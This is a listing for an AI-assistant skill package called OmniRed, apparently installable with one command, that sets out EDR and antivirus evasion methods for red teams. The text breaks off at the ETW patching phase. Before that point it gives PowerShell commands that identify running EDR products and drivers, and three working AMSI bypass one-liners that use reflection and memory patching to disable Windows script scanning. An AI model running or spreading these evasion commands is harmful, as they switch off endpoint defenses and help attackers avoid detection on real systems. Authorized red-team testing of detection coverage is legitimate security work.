edr-evasionlisted

EDR/AV evasion methodology for authorized red team operations. Covers process injection, AMSI bypass, ETW patching, LOLBins, reflective loading, and obfuscation techniques for testing endpoint detection coverage.
sunilgentyala/OmniRed · ★ 0 · AI & Automation · score 63

Install: claude install-skill sunilgentyala/OmniRed

# EDR Evasion ## Attack Surface Endpoint Detection and Response (EDR) products use: kernel callbacks, userland API hooks, ETW (Event Tracing for Windows), behavioral analytics, static signatures, and memory scanning. Each layer is independently bypassable. ## Methodology ### Phase 1 — EDR identification ```powershell # Identify running EDR agents Get-Process | Where-Object { $_.Name -match 'sentinel|crowdstrike|defender|carbon|cylance|sophos|symantec|mcafee|trend|bitdefender' } # Check loaded drivers (kernel-level EDR components) Get-WmiObject Win32_SystemDriver | Where-Object {$_.Name -match 'csagent|sentinel|cb|windefend'} # Check userland hooks (EDR hooks ntdll.dll exports) # Use PE-sieve or moneta to detect hooked functions ``` ### Phase 2 — AMSI bypass ```powershell # Classic: patch AmsiScanBuffer return value (AmsiInitFailed) [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) # COM-based bypass [Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiSession','NonPublic,Static').GetValue($null),0x80070057) # Memory patch (requires SeDebugPrivilege) $a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') $b=$a.GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static') $c=$b.GetValue($null) [Runtime.InteropServices.Marshal]::WriteByte($c, 0x258, 0) ``` ### Phase 3 — ETW patching ```power